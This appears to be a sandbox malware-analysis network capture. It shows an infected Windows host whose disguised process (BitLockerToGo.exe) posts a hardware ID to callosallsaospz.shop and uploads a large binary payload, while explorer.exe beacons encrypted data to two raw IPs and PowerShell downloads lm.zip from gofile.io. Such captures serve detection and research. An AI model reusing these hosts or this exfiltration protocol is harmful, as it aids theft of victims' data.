P94bZQ7q71IzHqnupStsnz7bJxsA8aoSbYSJTJAby9vMJYU2VKQL2cgQePoPXcLxkd4ITdJrBGS5Fqvf/8KjovYFourxcdXzhasm1b88wj0SkRVWS2QgPshJG0jX1LLy117RKFBIGnw6oxcxTY09cTmLcqF7womAicO0z1misODceP25yoNvwfnRwiFSvPYFvlcg2ELpETw+6BsqXwMLUqpKH2uuBcjRfJFOyl15jE0byR0RYcPIP4Ae2/ipC4t

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	51846	188.114.96.3	443	320	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:43 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1257 Host: callosallsaospz.shop
2024-07-27 05:30:43 UTC	1257	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 32 35 45 31 44 37 39 30 37 41 38 31 33 42 30 43 32 44 30 35 38 38 33 30 39 43 31 36 44 36 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A25E1D7907A813B0C2D0588309C16D62--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
2024-07-27 05:30:43 UTC	802	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:30:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=phgtl1andki8atbmka8o475v40; expires=Tue, 19-Nov-2024 23:17:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tDu0JNQjpz5amuyG05CKSELkrGFw3RFu4V7MTv1hRb2PdJZWm2Ew0HJ4FTORrpXIPeneIPrGnjjXoALdX9iev9fbEZvpxhl1wYD0aWldpByQHuRIgV5plon8hGifXgEDW3LqjHDv3A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a3d360c5519bf-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 05:30:43 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-27 05:30:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	51847	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:45 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:30:45 UTC	1267	OUT	Data Raw: 6a 30 68 6f 2f 6e 57 45 6b 43 59 61 64 6b 46 78 4a 66 59 4c 69 4d 33 2b 67 4a 41 36 70 46 6e 44 51 4a 4b 69 69 52 4f 59 53 49 7a 35 6a 68 6d 37 66 32 77 57 53 5a 6a 4d 70 61 6f 48 46 55 58 68 61 37 77 43 66 32 61 59 5a 4e 46 4e 62 45 65 35 45 31 73 64 47 73 30 73 4d 58 49 39 49 34 50 44 43 6a 69 54 6b 30 71 47 76 2f 4f 4b 2f 2f 31 54 57 42 4b 35 36 36 4f 49 2f 62 34 39 32 76 78 2f 32 32 61 52 4d 73 5a 47 71 68 48 35 72 44 64 43 70 67 74 37 69 44 48 48 6d 57 4a 4b 32 51 77 42 72 47 6a 57 43 31 78 58 7a 65 63 36 74 45 49 50 5a 50 39 6c 7a 66 49 70 4f 2b 39 63 73 66 42 54 71 57 49 67 46 45 4f 55 6c 4d 37 41 62 77 39 48 42 71 7a 34 62 4a 6d 56 54 4e 50 43 78 33 54 66 52 33 46 50 66 33 4e 6e 6a 4d 62 39 30 52 79 6c 34 48 67 39 66 6f 75 57 75 4d 58 58 4c 74 51 Data Ascii: j0ho/nWEkCYadkFxJfYLiM3+gJA6pFnDQJKiiROYSIz5jhm7f2wWSZjMpaoHFUXha7wCf2aYZNFNbEe5E1sdGs0sMXI9I4PDCjiTk0qGv/OK//1TWBK566OI/b492vx/22aRMsZGqhH5rDdCpgt7iDHHmWJK2QwBrGjWC1xXzec6tEIPZP9lzfIpO+9csfBTqWIgFEOUlM7Abw9HBqz4bJmVTNPCx3TfR3FPf3NnjMb90Ryl4Hg9fouWuMXXLtQ
2024-07-27 05:30:46 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:30:45 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:30:46 UTC	685	IN	Data Raw: 69 35 42 70 70 77 75 65 51 77 75 4f 44 73 79 41 6a 54 6b 51 4e 43 4f 78 77 54 45 50 38 2f 33 54 6e 35 59 73 6c 78 77 32 61 6d 56 33 70 43 64 71 43 39 61 42 30 39 74 59 41 68 76 4f 71 4e 46 45 4f 4b 4b 78 50 48 6d 72 76 53 36 62 62 2b 78 62 55 74 4e 59 65 31 4f 4e 4f 44 59 42 4b 6b 43 43 63 68 52 44 4c 75 51 36 46 55 6d 6e 73 65 68 50 7a 51 6d 4b 43 36 2f 4d 74 68 47 77 52 31 39 54 6f 6f 55 41 79 6f 31 63 42 35 58 4c 75 39 62 65 77 49 30 41 38 74 51 34 2b 7a 4e 47 51 47 35 5a 69 59 5a 71 59 56 70 41 68 4d 50 70 70 50 67 6a 72 6b 72 4c 38 38 79 4a 38 55 71 50 75 55 64 41 6d 43 65 49 4e 67 63 52 4e 5a 78 50 52 4b 6a 4f 6b 4c 43 4c 57 78 68 53 30 62 62 31 6d 47 79 69 73 45 4c 68 31 71 64 42 38 53 2b 37 41 46 49 35 2f 6b 68 37 6f 4a 39 5a 56 4b 36 56 55 70 64 Data Ascii: i5BppwueQwuODsyAjTkQNCOxwTEP8/3Tn5Yslxw2amV3pCdqC9aB09tYAhvOqNFEOKKxPHmrvS6bb+xbUtNYe1ONODYBKkCCchRDLuQ6FUmnsehPzQmKC6/MthGwR19TooUAyo1cB5XLu9bewI0A8tQ4+zNGQG5ZiYZqYVpAhMPppPgjrkrL88yJ8UqPuUdAmCeINgcRNZxPRKjOkLCLWxhS0bb1mGyisELh1qdB8S+7AFI5/kh7oJ9ZVK6VUpd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	51848	188.114.96.3	443	320	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:45 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 569437 Host: callosallsaospz.shop
2024-07-27 05:30:45 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 32 35 45 31 44 37 39 30 37 41 38 31 33 42 30 43 32 44 30 35 38 38 33 30 39 43 31 36 44 36 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A25E1D7907A813B0C2D0588309C16D62--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
2024-07-27 05:30:45 UTC	15331	OUT	Data Raw: ef ef 17 82 e0 e3 ef ca f2 57 6a 30 ce c3 83 7a de 92 3f 63 fc bf 90 9a f4 65 cf 4e 84 49 69 ff cb ef fe 23 d5 7e 5e bf dc 9f fb f3 03 bd 2a 3c 90 5d 91 a6 3b 8b ae b0 92 8b ac c6 9d ff 01 94 a6 c7 ff ef 76 93 ff fb 00 0f d1 01 38 33 45 81 56 02 a1 df 10 16 6c 7c d0 3e 9a 51 93 09 0a e3 9d 44 2f 34 f4 db 85 64 3f e6 fe 8c 11 42 fa 53 59 af d3 76 04 80 54 23 2d 18 1e 1f ec 05 3b 63 a0 c7 de 90 be 2b 7b 4f 4f 73 30 c6 9d d6 28 8f 3b be ea 2c 87 ba 5c e1 dc b1 db 36 6f 01 b5 44 4a 40 b8 7d 54 a2 30 d3 d7 3c f6 50 3b 27 92 8e 4e e2 7a dd 4b 11 3d c2 b9 de 8e 82 c0 ef 57 a6 93 fb 69 8d d3 a7 e8 dc 9e 1f d4 50 dd 3e 6f e2 c2 26 4d f4 dc 98 d8 01 75 41 d9 f0 6f df 00 12 c1 a7 06 4a b3 92 ce 39 a7 63 73 b5 10 47 0e 7d ba 00 2c fb 15 a1 b1 06 d6 ce fa 95 16 9b a1 Data Ascii: Wj0z?ceNIi#~^*<];v83EVl\|>QD/4d?BSYvT#-;c+{OOs0(;,\6oDJ@}T0<P;'NzK=WiP>o&MuAoJ9csG},
2024-07-27 05:30:45 UTC	15331	OUT	Data Raw: c3 53 6c ae 7d 24 f1 67 4a 95 8d a8 cc bc 0e 75 ce 6a 04 9b a3 b8 ec 6f b4 9d 1b 42 9d 37 f4 43 d0 77 09 3e a9 8e 95 6a 58 f8 65 c4 78 66 5f 12 9e fd bc c2 df 42 1b a4 95 86 59 22 68 79 85 08 c0 d6 c3 ee 0c 0a b3 1e 00 ba 95 c1 ff 26 d9 39 60 e9 07 c8 2c 04 b9 5f 52 0e 9e 6d a2 08 72 dd 9e e4 ff b7 6f bb 7c aa 78 b2 b9 02 24 00 24 91 f7 7c ee f3 c4 81 c8 2e 0d 19 14 24 c0 fa 20 2e 3a 29 d2 01 9c 77 c2 59 8a 23 d2 0e d0 a1 d0 0b 60 e0 71 35 d3 a3 d8 a2 e0 55 73 fe a5 53 f7 e6 61 17 0c d6 64 db ee ca ee 2b 88 1b ea 32 e0 01 66 e9 de 68 61 9a 43 36 aa db 0c 8e 09 9a 8d 48 4f 19 d2 76 54 31 96 f1 51 6f be ab 26 74 1c 2f f1 11 37 04 0f 3e cc 44 bd 56 2a d6 a3 14 ec 6d 31 d8 d9 73 4a a9 6c a9 71 13 0b 07 3d fd e9 9d 98 57 bb ac 15 22 ca c1 de 61 06 3e 69 9f 92 Data Ascii: Sl}$gJujoB7Cw>jXexf_BY"hy&9`,_Rmro\|x$$\|.$ .:)wY#`q5UsSad+2fhaC6HOvT1Qo&t/7>DV*m1sJlq=W"a>i
2024-07-27 05:30:45 UTC	15331	OUT	Data Raw: db f1 12 ae 4c a4 4e a4 59 d6 a8 a7 84 bb 74 ba 8e 5d da 4a f6 15 69 c7 68 fc e9 c3 12 bb 39 9e 0a 62 47 52 d3 58 1e b5 bb d3 3d 9c 9d 22 76 88 6c 5a a8 20 5f d5 8a 5c 3d 43 57 45 ed d8 93 9a 98 ac ce 9a 98 99 af 66 65 32 c8 13 0d e9 7f 71 e1 43 a8 fe c4 6f 5b f6 83 8c 74 99 f0 cb 65 02 f5 95 5b cc f5 91 b1 98 19 7e 6a 3b e1 6b c3 d9 af 9b 1d 5f 34 f6 dd 92 a4 a5 2e bd 4a 4b 0f 31 43 20 20 28 26 56 a6 c0 06 71 e1 da 02 8a 1c 06 41 4c 19 70 15 ab 2b 09 11 b5 34 0a d4 1f 9a 5c 3f 3f 6a ba e7 28 e8 e5 c7 a8 a6 72 cc f3 41 06 85 7a f9 87 69 45 f8 57 fd 9c d2 3f 7d 0d 75 6e 7f 90 07 5d 75 d8 0f eb 59 cf f6 bc 17 03 96 57 80 25 a6 ec 23 a0 4a ae bb bb 1e c8 50 03 85 f1 7f a6 97 a5 11 33 2d 41 9b 51 32 0b ba 42 ae 4a 5f 87 88 3d b7 7e f8 ce b2 1b b5 f4 9c 3f dd Data Ascii: LNYt]Jih9bGRX="vlZ _\=CWEfe2qCo[te[~j;k_4.JK1C (&VqALp+4\??j(rAziEW?}un]uYW%#JP3-AQ2BJ_=~?
2024-07-27 05:30:45 UTC	15331	OUT	Data Raw: 2f ef 1a 3b 48 81 8e a2 e8 7e 78 95 10 8f 97 e1 2b c9 c3 d7 19 d2 04 ba 6e e6 fb 33 a3 af 46 9b 31 61 85 b7 55 2e 3e 2a 89 f8 8c d6 9d 9c 45 e6 14 c1 85 7f f0 21 d0 e5 6e 1e 2a b6 35 a3 4a 40 10 1a c3 94 a3 23 50 64 55 c4 cf 9b 05 e6 01 c7 4b 4e 6b 34 87 f8 ad 47 db 93 5b 6d ba bf 40 04 f4 7d 71 d0 f1 2b 7b 0d 28 47 53 ee b5 ba 3a d1 56 3a 75 35 dc b6 fa a6 d5 9d 15 4c d2 eb f0 2d bc 51 ba 32 b0 55 f1 2f 85 30 20 90 0b da b5 c1 40 f1 83 ae 19 ee 26 05 67 05 20 3f 3a 32 68 a3 f0 bd 85 a3 74 e8 4d bd d5 40 b8 e7 df c9 0c fb 42 4b 7e 8e 1d b8 7e 9a 80 45 bb ae 70 43 0a 0e 24 40 8a 45 88 f0 23 76 7e ee c7 60 30 37 e1 da 82 3a b4 14 16 1a 19 19 44 0e f7 db d4 ec e7 a3 5a 34 37 05 15 98 93 16 ce 10 4c 4f 9c 8a 48 a7 68 57 70 54 bd 55 60 6b e5 74 a2 16 4b 15 5c Data Ascii: /;H~x+n3F1aU.>E!n5J@#PdUKNk4G[m@}q+{(GS:V:u5L-Q2U/0 @&g ?:2htM@BK~~EpC$@E#v~`07:DZ47LOHhWpTU`ktK\
2024-07-27 05:30:45 UTC	15331	OUT	Data Raw: 36 6a 6b 6a 96 da 82 5a a6 d9 39 c1 4b e9 51 e9 02 93 8f 18 3f ab 11 fd 7f 96 d2 17 53 69 e5 1a ef a8 12 5a ca b6 f5 c8 36 ab 33 52 51 74 8d 92 f8 15 47 7f dc b2 62 9f 68 65 a5 98 ad 34 90 90 2d 22 92 2c fd 76 e2 eb c7 c2 16 5e c9 4f c5 30 60 d7 6a de fa 76 2f fd 16 f7 85 63 63 6d 18 63 7a eb 5b 25 3c 8d eb d0 87 9d 38 1e ca ac 2a 89 87 f2 f7 55 49 7c 0d 11 df d9 9f ff 14 aa 33 76 c6 d5 bd ef 25 f8 92 8e fa 6e 75 bb 39 a7 49 3e 5c 93 44 31 fe 6e 59 f8 16 5c b1 65 b7 c1 cc b1 0c 11 1f 89 bb 04 ae 0c 27 a2 3e 92 2f 9c 9e c8 54 c7 43 b3 31 a3 b6 39 35 51 5c f7 88 14 8e c6 79 96 39 84 10 32 72 20 4f 61 b3 ee a2 32 20 ac 0d 76 fd bc 65 c8 ce 70 5f b7 1c 72 55 00 51 47 7a d7 f4 a0 21 c9 74 12 9b e2 02 23 9f eb e0 60 f7 cc 5a c0 a6 0b 36 1b 48 6d 6f 3c c8 30 9d Data Ascii: 6jkjZ9KQ?SiZ63RQtGbhe4-",v^O0`jv/ccmcz[%<8*UI\|3v%nu9I>\D1nY\e'>/TC195Q\y92r Oa2 vep_rUQGz!t#`Z6Hmo<0
2024-07-27 05:30:45 UTC	15331	OUT	Data Raw: 2c d9 50 50 ec 85 18 f8 11 95 a5 12 37 c0 d0 02 11 53 7b cb cf e2 c0 0e 11 94 6c e0 d5 96 ec e3 a6 b2 f6 f4 19 13 d2 dd 00 db ca d5 ec e5 3c fd 2c ee 8a eb f6 cb cb 10 58 9f fd 9b 77 f6 2f 22 d0 31 40 32 84 4e 77 72 cf c3 d1 04 ce e2 e3 d9 76 e2 c9 91 d3 73 14 4d dc ed a5 b5 f0 4e c9 0b 67 9c ef e7 58 e0 45 2a 97 96 6f 06 f0 73 ee ca dd 96 39 26 64 f5 e5 a2 d6 b2 33 f7 ea a3 46 4f 9d d1 cd e4 d0 c1 9e 11 74 a1 f5 05 df 5a 9b dc f1 2d f9 07 3d 0b 1f 21 a4 78 0d a0 58 e3 6b 3f 42 f6 63 63 2d 75 1a 18 86 76 ad 80 6d e8 2c f2 bf 4b 10 e3 5d 76 2e 3b 52 45 1a 1e cb 68 c2 fd 0f 74 31 01 13 3f 52 73 c6 09 be 03 b2 82 c1 a5 dd 48 40 10 6d 0e da 1a 63 d4 01 bf 3e 30 df 59 98 4f 89 6c 92 3e f0 1b eb 46 d7 88 01 b3 16 8f 7d b0 cd 23 d8 8b b1 c1 97 db 26 47 f5 83 04 Data Ascii: ,PP7S{l<,Xw/"1@2NwrvsMNgXE*os9&d3FOtZ-=!xXk?Bcc-uvm,K]v.;REht1?RsH@mc>0YOl>F}#&G
2024-07-27 05:30:45 UTC	15331	OUT	Data Raw: f1 be d2 e9 f3 0d ae ca d9 f3 13 e9 26 0e 8a 97 95 9f eb cf ab 75 b8 25 d8 d6 2b c9 47 e8 5e 16 4e e2 69 42 7e a1 8d 84 ed 2d a7 5d 26 2d 13 47 c2 fb f1 41 ee 50 76 e5 aa 5a f9 4f 6c f1 e3 c8 b1 fb 66 fa 11 3c d0 9b a1 ee 91 11 55 fa 57 22 37 33 a8 f4 99 df 9f 12 ef 6f 91 19 aa 41 6f 24 c9 f4 5e 71 c1 ee df 99 b6 12 ef 4f 97 57 d2 53 04 c9 3e a7 7f ff b9 1b 02 82 9d fd 7c 18 f0 48 39 f3 b1 2b 32 3b 91 7a 7b 5e 93 5d 23 ce f5 f4 2f 7b 52 e7 5d 71 83 a7 e5 b0 7a f4 95 be e5 31 53 c8 ee b8 bb fd 75 ee bf df 2b 1e 47 69 74 4b d6 09 c2 7b 39 de 0c 16 06 77 6b 55 3c 1c 7f 7e 2b 3b cc 38 52 42 1f b5 5a 5b 8b b4 99 73 6b be 93 b7 96 83 c8 44 80 91 85 76 8c a6 bf 67 e4 61 8d c8 be 8c 21 db 59 f6 ec 0f 11 75 da c3 31 f0 b9 bd d2 22 dd 27 8e b8 67 6a c2 a8 b8 47 6e Data Ascii: &u%+G^NiB~-]&-GAPvZOlf<UW"73oAo$^qOWS>\|H9+2;z{^]#/{R]qz1Su+GitK{9wkU<~+;8RBZ[skDvga!Yu1"'gjGn
2024-07-27 05:30:45 UTC	15331	OUT	Data Raw: d1 aa 5d 80 3b 39 1f 75 12 0f 17 dd ee 98 ab 67 5b b8 67 27 e2 0e ec 94 47 98 af 30 af f1 20 aa 0a 59 f9 f2 e7 38 69 a4 14 42 e2 b8 f0 97 71 ba fe 89 e3 22 1a 8e b0 ec dc d5 31 db 08 c2 68 ad 00 f7 16 b0 f9 6a 2c 01 10 9c 37 a3 d6 68 0b 02 ec e2 2d 92 7d 3c f2 f7 da 49 db 6c 74 cc 5a b8 9d 59 fd 5d 0c 25 6d 03 13 33 3e a4 8b d1 6a 45 24 24 11 5b 99 48 16 72 f6 e7 df 38 f9 61 be 8f df c9 c7 63 a3 cc 28 cc 67 e2 8c 73 d8 3c 42 71 d9 56 a2 f2 d2 d7 49 cd f6 c6 55 45 9d 57 3b a8 a8 88 db 52 84 be f0 77 87 f1 9e 00 f6 17 39 74 b4 95 39 a5 df f6 b3 95 f4 64 97 cc 7d 73 95 c9 73 3d b9 e4 8e 4a ce c7 63 ba 34 92 ef 96 e8 e6 9b 03 1d 8a 7a 4a f8 c4 fa 34 05 3b 0c e1 fe b7 5a 54 58 f5 45 bc c7 00 f5 ba 8f da 32 fc b5 fd 28 c2 73 36 35 91 d6 d3 b8 55 bf 6f 12 22 c0 Data Ascii: ];9ug[g'G0 Y8iBq"1hj,7h-}<IltZY]%m3>jE$$[Hr8ac(gs<BqVIUEW;Rw9t9d}ss=Jc4zJ4;ZTXE2(s65Uo"
2024-07-27 05:30:45 UTC	15331	OUT	Data Raw: f7 e2 80 c5 6c 2a a3 48 74 38 eb 82 d9 8b 7a 40 2d 49 a2 56 8b 81 1b 3b ed 72 ea bd bc 1a 78 c6 64 87 2e 06 3c ef 14 93 cf a9 9e e6 b8 3d 69 2e 3e c2 b9 f1 3d 56 0a de cb 3a 90 1a 23 01 f0 1d 38 06 8e 80 ef 46 c1 b2 5b 5f b4 bf b4 f0 32 9d 69 44 74 b9 b3 c5 25 0b 14 ac 1b db 29 dc 92 a7 79 0c 58 5a 64 37 d4 ab ac 85 24 b7 20 89 e5 28 d5 1e 37 a4 96 b2 52 1f 55 9d a5 2a 2f 74 7f d1 05 41 aa e4 80 2d 09 f0 61 dd 4c d0 50 66 ea 55 31 5f 1e 66 31 f3 78 f4 c6 a9 37 d8 2b 43 0d 68 dd 2d 7a 48 7f 8f 49 fe b9 12 cd 24 38 42 0a f4 36 e0 01 31 1f a0 c4 ab 0f d0 95 68 4a c9 26 8a 37 b5 99 7b a3 8c 04 c1 aa bd 5b bd 1d 92 25 b8 45 21 36 18 9b 87 ef d8 da 35 6b c6 4a 15 75 2d 30 43 c1 e5 c9 3b a8 e9 7d cd 4b 22 52 61 93 6a c4 19 91 2b 28 19 0d 62 00 74 d7 ce db 7f 96 Data Ascii: lHt8z@-IV;rxd.<=i.>=V:#8F[_2iDt%)yXZd7$ (7RU/tA-aLPfU1_f1x7+Ch-zHI$8B61hJ&7{[%E!65kJu-0C;}K"Raj+(bt
2024-07-27 05:30:48 UTC	814	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:30:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pgva2ala8hs6gp46f8cjo7j2c3; expires=Tue, 19-Nov-2024 23:17:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zDwY0Rl%2FGrtCdyeqJd2%2BHMl6BCTwerumGnEhEQBBu40BqglHfz%2BNG2s8Cpkzai%2BANa%2B9vl7naCk8p5dRtTcSMTguhG1Na15cLihZxr%2FRlR4TjOdcrdqbUk28yXjTFUUUufJjkejGZQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a3d4379fd4245-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	51849	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:46 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:30:46 UTC	1267	OUT	Data Raw: 49 6d 37 75 56 42 6a 75 49 63 42 61 30 6b 4b 46 51 50 6b 44 62 47 6e 6a 52 72 6c 6e 54 65 53 74 48 30 42 72 42 39 51 68 4d 74 58 71 67 4e 41 61 44 33 79 74 5a 2b 50 41 56 51 57 55 32 55 4e 53 55 38 42 45 55 77 44 44 4a 6f 45 78 6e 37 78 47 30 52 6d 2f 6f 44 46 67 6c 6f 6b 6d 36 4a 39 30 4c 37 65 63 53 57 39 77 4d 50 51 58 44 64 2b 7a 36 4b 56 46 51 33 5a 43 48 55 79 4d 51 47 48 45 6a 6d 7a 51 59 6f 44 6c 50 59 63 66 69 4c 75 2b 75 35 34 32 64 32 6e 4a 61 63 63 79 38 57 46 70 36 76 48 6e 43 4e 6e 48 46 74 77 56 68 36 6a 52 38 43 74 35 74 6c 76 6c 6d 33 65 51 76 44 51 77 33 56 75 55 6a 2f 67 53 41 39 75 5a 7a 4e 6e 63 61 6a 4a 41 61 62 64 37 65 70 64 49 50 67 37 7a 77 45 74 4f 67 56 7a 46 54 5a 4d 52 52 6c 4e 37 32 46 36 5a 63 73 49 78 48 65 45 48 6e 4c 51 Data Ascii: Im7uVBjuIcBa0kKFQPkDbGnjRrlnTeStH0BrB9QhMtXqgNAaD3ytZ+PAVQWU2UNSU8BEUwDDJoExn7xG0Rm/oDFglokm6J90L7ecSW9wMPQXDd+z6KVFQ3ZCHUyMQGHEjmzQYoDlPYcfiLu+u542d2nJaccy8WFp6vHnCNnHFtwVh6jR8Ct5tlvlm3eQvDQw3VuUj/gSA9uZzNncajJAabd7epdIPg7zwEtOgVzFTZMRRlN72F6ZcsIxHeEHnLQ
2024-07-27 05:30:48 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:30:47 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:30:48 UTC	685	IN	Data Raw: 63 78 4e 66 70 78 4c 7a 59 69 6b 44 66 61 5a 31 79 49 71 70 77 6f 74 70 32 76 52 2b 6c 6a 4f 57 76 73 63 63 6a 75 4f 6b 68 5a 4e 46 57 47 75 7a 51 75 71 30 4c 48 36 70 46 49 7a 75 32 68 61 31 4a 69 73 49 4a 76 79 2b 68 5a 49 68 6d 36 64 41 49 73 66 74 32 37 31 59 59 57 30 74 53 7a 67 2b 48 71 62 54 66 49 2b 7a 69 37 45 63 53 48 64 33 63 39 4b 52 4b 5a 4b 4b 4c 68 71 50 73 37 73 71 31 66 64 5a 61 4f 7a 30 43 33 62 59 35 73 42 79 36 2b 77 61 2f 79 74 45 74 43 58 44 64 69 5a 71 70 2f 36 45 35 48 64 66 67 39 42 36 4a 42 35 42 48 66 41 59 62 63 30 4e 77 75 77 59 46 4f 62 70 56 35 71 43 4f 36 63 2f 30 77 74 51 6d 41 34 74 6b 56 61 34 48 53 73 58 53 42 38 53 61 43 56 76 6e 33 4e 43 62 36 6c 53 7a 44 65 44 61 75 6e 51 2f 67 44 2b 4e 64 54 33 64 2f 71 6e 57 50 52 Data Ascii: cxNfpxLzYikDfaZ1yIqpwotp2vR+ljOWvsccjuOkhZNFWGuzQuq0LH6pFIzu2ha1JisIJvy+hZIhm6dAIsft271YYW0tSzg+HqbTfI+zi7EcSHd3c9KRKZKKLhqPs7sq1fdZaOz0C3bY5sBy6+wa/ytEtCXDdiZqp/6E5Hdfg9B6JB5BHfAYbc0NwuwYFObpV5qCO6c/0wtQmA4tkVa4HSsXSB8SaCVvn3NCb6lSzDeDaunQ/gD+NdT3d/qnWPR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	51850	31.14.70.245	443	2136	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:48 UTC	196	OUT	GET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: store4.gofile.io
